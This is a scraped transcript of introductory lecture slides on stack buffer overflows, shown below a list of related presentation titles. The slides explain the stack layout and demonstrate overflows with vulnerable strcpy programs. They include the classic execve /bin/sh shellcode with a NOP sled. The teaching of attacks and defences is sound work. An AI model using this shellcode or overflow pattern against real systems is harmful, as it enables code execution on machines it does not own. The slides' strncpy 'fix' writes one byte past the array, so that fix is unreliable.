Overflows & Exploits. In the beginning 11/02/1988 Robert Morris, Jr., a graduate student in Computer Science at Cornell, wrote an experimental, self-replicating,

Slides:

Advertisements

Similar presentations

Buffer Overflows Nick Feamster CS 6262 Spring 2009 (credit to Vitaly S. from UT for slides)

Advertisements

Smashing the Stack for Fun and Profit

Exploring Security Vulnerabilities by Exploiting Buffer Overflow using the MIPS ISA Andrew T. Phillips Jack S. E. Tan Department of Computer Science University.

David Brumley Carnegie Mellon University Credit: Some slides from Ed Schwartz.

CMSC 414 Computer and Network Security Lecture 22 Jonathan Katz.

Review: Software Security David Brumley Carnegie Mellon University.

Foundations of Network and Computer Security J J ohn Black Lecture #30 Nov 26 th 2007 CSCI 6268/TLEN 5831, Fall 2007.

Intro to Exploitation Stack Overflows James McFadyen UTD Computer Security Group 10/20/2011.

Gabe Kanzelmeyer CS 450 4/14/10.  What is buffer overflow?  How memory is processed and the stack  The threat  Stack overrun attack  Dangers  Prevention.

The Attack and Defense of Computers Dr. 許富皓 Attacking Program Bugs.

1 Function Calls Professor Jennifer Rexford COS 217 Reading: Chapter 4 of “Programming From the Ground Up” (available online from the course Web site)

1 Homework Reading –PAL, pp , Machine Projects –Finish mp2warmup Questions? –Start mp2 as soon as possible Labs –Continue labs with your.

September 22, 2014 Pengju (Jimmy) Jin Section E

Control hijacking attacks Attacker’s goal: – Take over target machine (e.g. web server) Execute arbitrary code on target by hijacking application control.

University of Washington CSE 351 : The Hardware/Software Interface Section 5 Structs as parameters, buffer overflows, and lab 3.

Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-

CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2011.

Fall 2008CS 334: Computer SecuritySlide #1 Smashing The Stack A detailed look at buffer overflows as described in Smashing the Stack for Fun and Profit.

Lecture 6: Buffer Overflow CS 436/636/736 Spring 2014 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)

UNIVERSITY OF SOUTH CAROLINA Department of Computer Science and Engineering Stack allocation and buffer overflow CSCE 531 Presentation by Miao XU

Exploiting Buffer Overflows on AIX/PowerPC HP-UX/PA-RISC Solaris/SPARC.

Understand stack Buffer overflow attack and defense Controls against program threats.

University of Washington Today Memory layout Buffer overflow, worms, and viruses 1.

Let’s look at an example I want to write an application that reports the course scores to you. Requirements: –Every student can only get his/her score.

CrackChat #2 Stack Overflows and Format Strings Part 2: Baking the Egg

Buffer Overflows : An In-depth Analysis. Introduction Buffer overflows were understood as early as 1972 The legendary Morris Worm made use of a Buffer.

Introduction: Exploiting Linux. Basic Concepts Vulnerability A flaw in a system that allows an attacker to do something the designer did not intend,

Mitigation of Buffer Overflow Attacks

CNIT 127: Exploit Development Ch 4: Introduction to Format String Bugs.

University of Washington Today Happy Monday! HW2 due, how is Lab 3 going? Today we’ll go over:  Address space layout  Input buffers on the stack  Overflowing.

Buffer Overflow CS461/ECE422 Spring Reading Material Based on Chapter 11 of the text.

Derived from "x86 Assembly Registers and the Stack" by Rodney BeedeRodney Beede x86 Assembly Registers and the Stack Nov 2009.

Smashing the Stack Overview The Stack Region Buffer Overflow

Buffer Overflow. Introduction On many C implementations, it is possible to corrupt the execution stack by writing past the end of an array. Known as smash.

Lecture 8: Buffer Overflow CS 436/636/736 Spring 2013 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)

Buffer Overflow Attack Proofing of Code Binary Gopal Gupta, Parag Doshi, R. Reghuramalingam, Doug Harris The University of Texas at Dallas.

Lecture 9: Buffer Ovefflows and ROP EEN 312: Processors: Hardware, Software, and Interfacing Department of Electrical and Computer Engineering Spring 2014,

CNIT 127: Exploit Development Ch 1: Before you begin.

What is exactly Exploit writing?  Writing a piece of code which is capable of exploit the vulnerability in the target software.

A Tool for Pro-active Defense Against the Buffer Overrun Attack D. Bruschi, E. Rosti, R. Banfi Presented By: Warshavsky Alex.

1 Understanding Pointers Buffer Overflow. 2 Outline Understanding Pointers Buffer Overflow Suggested reading –Chap 3.10, 3.12.

Buffer overflow and stack smashing attacks Principles of application software security.

F’08 Stack Discipline Aug. 27, 2008 Nathaniel Wesley Filardo Slides stolen from CMU , whence they were stolen from CMU CS 438.

CS 155 Section 1 PP1 Eu-Jin Goh. Setting up Environment Demo.

Buffer Overflows Taught by Scott Coté.-. _ _.-. / \.-. ((___)).-. / \ /.ooM \ / \.-. [ x x ].-. / \ /.ooM \ -/ \ /-----\-----/---\--\ /--/---\-----/-----\ / \-

Information Security - 2. A Stack Frame. Pushed to stack on function CALL The return address is copied to the CPU Instruction Pointer when the function.

Analyzing C/C++ Vulnerabilities -- Mike Gerschefske.

CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2014.

Basic of Buffer Over Flow

Let’s look at an example

Mitigation against Buffer Overflow Attacks

Buffer Overflow Buffer overflows are possible because C doesn’t check array boundaries Buffer overflows are dangerous because buffers for user input are.

CS 177 Computer Security Lecture 9

Webserver w/user threads

The Hardware/Software Interface CSE351 Winter 2013

Homework Reading Machine Projects Labs PAL, pp ,

Exploiting & Defense Day 2 Recap

Software Security.

CS 465 Buffer Overflow Slides by Kent Seamons and Tim van der Horst

Assembly Language Programming II: C Compiler Calling Sequences

Understanding Program Address Space

Lecture 9: Buffer Overflow*

Machine Level Representation of Programs (IV)

CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2015.

Instructors: Majd Sakr and Khaled Harras

“Way easier than when we were students”

CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2016.

Understanding and Preventing Buffer Overflow Attacks in Unix

CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2013.

System and Cyber Security

Presentation transcript:

Overflows & Exploits

In the beginning 11/02/1988 Robert Morris, Jr., a graduate student in Computer Science at Cornell, wrote an experimental, self-replicating, self-propagating program called a worm and injected it into the Internet. One of the programs it attacked was fingerd which contained a buffer overflow. 02/13/1995 Thomas Lopatic posts to Bugtraq Hello there, we've installed the NCSA HTTPD 1.3 on our WWW server (HP9000/720, HP-UX 9.01) and I've found, that it can be tricked into executing shell commands. 08/11/1996 Smashing the Stack For Fun And Profit by Aleph1 (Phrack 49) syslog, splitvt, sendmail 8.7.5, Linux/FreeBSD mount, Xt library, at, etc.

Program Memory Your Program High Memory Addresses Low Addresses Args & Environment Variables Stack Unused Memory Heap Un-Initialized Data Segment (bss) Initialized Data Text Segment #include static int counter; static int another_variable = 0xAABBCCDD; void do_something(char *from) { char to[32]; strcpy(to, from); counter++; } int main( int argc, char **argv) { char *msg = "This is a constant string"; counter = 0; do_something(msg); printf("%d Somethings Done\n", counter); return 0; } RO data

The Stack A ‘stack’ is a type of data structure. The last object put on to the stack is the first that is removed. (LIFO) ‘Push’ – add something to the stack ‘Pop’ – remove something from the stack

Function Calls & The Stack When a function is called: 1.Function arguments are pushed on the stack. 2.Return address is pushed on the stack (in the ‘call’ instruction). 3.The previous function’s base pointer is pushed on the stack. 4.Local variables are pushed on the stack.

Functions Calls & The Stack Stack Heap 0xc x #include int add(int x, int y) { return x + y; } int main(int argc, char **argv) { int num = 0; num = add(4,5); printf("num: %d\n", num); return 0; } Num = Ret addr Saved base ptr (Add’s local vars) Stack Frame 1.Function arguments are pushed on the stack. 2.Return address is pushed on the stack (in the ‘call’ instruction). 3.The previous function’s base pointer is pushed on the stack. 4.Local variables are pushed on the stack.

%esp%ebp Function Calls & The Stack main: pushl %ebp movl %esp, %ebp subl $24, %esp andl $-16, %esp movl $0, %eax addl $15, %eax shrl $4, %eax sall $4, %eax subl %eax, %esp movl $0, -4(%ebp) movl $5, 4(%esp) movl $4, (%esp) call add movl %eax, -4(%ebp) movl -4(%ebp), %eax movl %eax, 4(%esp) movl $.LC0, (%esp) call printf movl $0, %eax leave ret Stack ebp1 0 %esp 5 4 %eip ebp2%ebp add: pushl %ebp movl %esp, %ebp movl 12(%ebp), %eax addl 8(%ebp), %eax popl %ebp ret X 9 %esp int add(int x, int y) { return x + y; } int main(int argc, char **argv) { int num = 0; num = add(4,5); printf("num: %d\n", num); return 0; }

Overflows #include static int counter; static int another_variable = 0xAABBCCDD; void do_something(char *from) { char to[32]; strcpy(to, from); counter++; } int main( int argc, char **argv) { char *msg = "This is a constant string"; counter = 0; do_something(msg); printf("%d Somethings Done\n", counter); return 0; } Ptr to msg Return Addr Base Ptr 32 bytes for ‘to’ This _is_ a_co nsta nt_s trin g\0 High Memory Addresses Low Addresses

Overflows #include static int counter; static int another_variable = 0xAABBCCDD; void do_something(char *from) { char to[32]; strcpy(to, from); counter++; } int main( int argc, char **argv) { char *msg = "This is a constant string that is too long for our buffer"; counter = 0; do_something(msg); printf("%d Somethings Done\n", counter); return 0; } g_fo Return Addr Base Ptr 32 bytes for ‘to’ This _is_ a_co nsta nt_s trin g_th at_is _too _lon Ptr to msg

Shellcode Shell code is raw machine code that performs some useful function for an attacker (usually to grant a ‘shell’) char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; See:

Ptr to msg Overflows #include void do_something(char *from) { char to[45]; strcpy(to, from); } int main( int argc, char **argv) { char *msg = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b” "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd“ "\x80\xe8\xdc\xff\xff\xff/bin/shAAAABBBB"; do_something(msg); return 0; } Return Addr Base Ptr "\xeb\x1f\x5e\x89\x 76\x08\x31\xc0\x88 \x46\x07\x89\x46\x 0c\xb0\x0b” "\x89\xf3\x8d\x4e\x 08\x8d\x56\x0c\xcd \x80\x31\xdb\x89\x d8\x40\xcd“ "\x80\xe8\xdc\xff\xff \xff/bin/sh"; BBBB AAAA 0xc0a104b0

Overflows #include void do_something(char *from) { char to[256]; strcpy(to, from); } int main( int argc, char **argv) { char *msg = “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90” “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90” “\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b” "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd“ "\x80\xe8\xdc\xff\xff\xff/bin/shAAAABBBB"; do_something(msg); return 0; } "\xeb\x1f\x5e\x89\x 76\x08\x31\xc0\x88 \x46\x07\x89\x46\x 0c\xb0\x0b” "\x89\xf3\x8d\x4e\x 08\x8d\x56\x0c\xcd \x80\x31\xdb\x89\x d8\x40\xcd“ "\x80\xe8\xdc\xff\xff \xff/bin/sh"; AAAA 0xc0a104?? \x90 \x90

Defenses strncpy(char *dest, char *src, int n) –Use safe(r) functions. –Check the size of the input before you copy blindly void do_something(char *from) { char to[256]; strncpy(to, from, 255); to[256] = ‘\0’; }

Defenses No eXecute stack – (NX bit) –Code should be run from the text section, the stack should never be the target of the instruction pointer. –Make the stack non-executable, and the processor will fault on a stack overflow attack

Defenses Stack Canary –Generated by the compiler –A random value is pushed to the stack after the return address –Before returning from a function the canary value is checked to see if it matches the set value –An attacker cannot determine the canary value before the execution of the program Ptr to msg Return Addr Base Ptr This _is_ a_co nsta nt_s trin g\0 Canary = 0x

Defenses Randomized Address Layouts –Segments of memory can be relocated slightly to produce different offsets each time a program is run –Hardcoded address (in shellcode for example) will not be valid from one run to the next

Recent Overflows Microsoft Windows Animated Cursor Remote Code Execution Vulnerability (3/28/2007) A remote code execution vulnerability exists in the way that cursor, animated cursor, and icon formats are handled. An attacker could try to exploit the vulnerability by constructing a malicious cursor or icon file that could potentially allow remote code execution if a user visited a malicious Web site or viewed a malicious message. An attacker who successfully exploited this vulnerability could take complete control of an affected system. –Windows 2000 SP4 –Windows 2003 SP0 - SP2 –Windows XP SP2 –Vista SP0

Links Attack – – – Defense – – – Misc –BugTraq - –VulnDev - –Metasploit -